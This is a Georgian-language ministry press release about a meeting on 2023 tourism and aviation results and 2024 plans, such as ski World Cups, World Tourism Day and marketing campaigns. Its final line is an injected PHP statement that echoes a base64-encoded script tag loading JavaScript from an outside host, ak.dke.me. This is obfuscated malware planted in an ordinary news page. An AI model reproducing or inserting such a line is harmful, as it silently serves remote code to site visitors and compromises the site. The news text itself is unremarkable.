celsiusi
ავერსი შნაიდერი

ეკონომიკისა და მდგრადი განვითარების მინისტრის მოადგილე მარიამ ქვრივიშვილმა და ტურიზმის ეროვნული ადმინისტრაციის ხელმძღვანელმა, მაია ომიაძემ ტურიზმის ინდუსტრიის წარმომადგენლებს ტურიზმისა და სამოქალაქო ავიაციის სექტორებში 2023 წლის სამი კვარტლის შედეგები, აგრეთვე მიმდინარე პროექტები და სამომავლოდ დაგეგმილი აქტივობები გააცნეს.

შეხვედრაში მონაწილეობდნენ სასტუმროების, ტურისტული კომპანიების, ასოციაციების, აგრეთვე საგარეო საქმეთა სამინისტროს წარმომადგენლები.

შეხვედრაზე განსაკუთრებული აქცენტი გაკეთდა საკურორტო ზონების განვითარებასა და სამთო-სათხილამურო კურორტების ინფრასტრუქტურის გაძლიერებაზე. მინისტრის მოადგილის ინფორმაციით, 2024 წელს ქვეყანაში მნიშვნელოვანი ღონისძიებები გაიმართება, რომელთა შორის აღსანიშნია სათხილამურო მსოფლიო თასები და 2024 წლის ტურიზმის მსოფლიო დღის მასპინძლობა.

„2024 წელს ვემზადებით მნიშვნელოვანი ღონისძიებების მასპინძლობისთვის, ეს იქნება სათხილამურო მსოფლიო თასები და ტურიზმის მსოფლიო დღის მასპინძლობა. დარწმუნებული ვარ, საერთო ძალისხმევით, ჩვენი ქვეყნის ტურიზმის ინდუსტრია კვლავ ერთ-ერთი სწრაფად მზარდი იქნება მსოფლიოში, შემოვიტანთ უფრო მეტ შემოსავალს ტურიზმის ინდუსტრიიდან ქვეყნის ეკონომიკაში. კერძო სექტორთან მჭიდრო თანამშრომლობით ქვეყანაში შეიქმნება კიდევ უფრო მეტი სამუშაო ადგილი, რომელიც დადებითად აისახება ჩვენი ქვეყნის მცირე და საშუალო მეწარმეების გაძლიერებაზე“, – განაცხადა მარიამ ქვრივიშვილმა შეხვედრაზე.

შეხვედრაზე აღინიშნა, რომ 2024 წელს ტურიზმის ეროვნული ადმინისტრაცია აქტიურ კამპანიას იწყებს ღვინისა და ქართული სამზარეულოს პოპულარიზაციისათვის. ასევე იგეგმება ინფლუენსერების აქტივაციის პროექტი, რომლის ფარგლებშიც სოციალური ქსელებით ინფლუენსერები გააზიარებენ თავიანთ გამოცდილებას საქართველოს შესახებ.

აღინიშნა, რომ საქართველოს ტურიზმის ადმინისტრაცია გეგმავს მარკეტინგული საქმიანობის გააქტიურებას ევროკავშირის, სკანდინავიის, ყურის ქვეყნების, აშშ – ის, ჩინეთის, ინდოეთისა და იაპონიის ტურისტულ ბაზარზე. გარდა ამისა, მომავალ წელს ტურიზმის ეროვნული ადმინისტრაცია 21 ტურისტულ გამოფენაში მიიღებს მონაწილეობას, მოაწყობს ციფრულ მარკეტინგულ კამპანიებს, უმასპინძლებს საერთაშორისო მედიის წარმომადგენლებსა და ბლოგერებს, გაიმართება გაცნობითი ტურები საერთაშორისო ტურისტული კომპანიებისთვის. საქმიანი ტურიზმის პოპულარიზაციის მიზნით გაიმართება 10 ღონისძიება, მათ შორის საქართველოში ჩატარდება მასშტაბური ფორუმი M&I თბილისში. საქართველო 2024 წელს იქნება მსოფლიო ტურიზმის დღის მასპინძელი ქვეყანა.

ინფორმაციას საქართველოს ეკონომიკისა და მდგრადი განვითარების სამინისტროს პრესსამსახური ავრცელებს. 

330
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");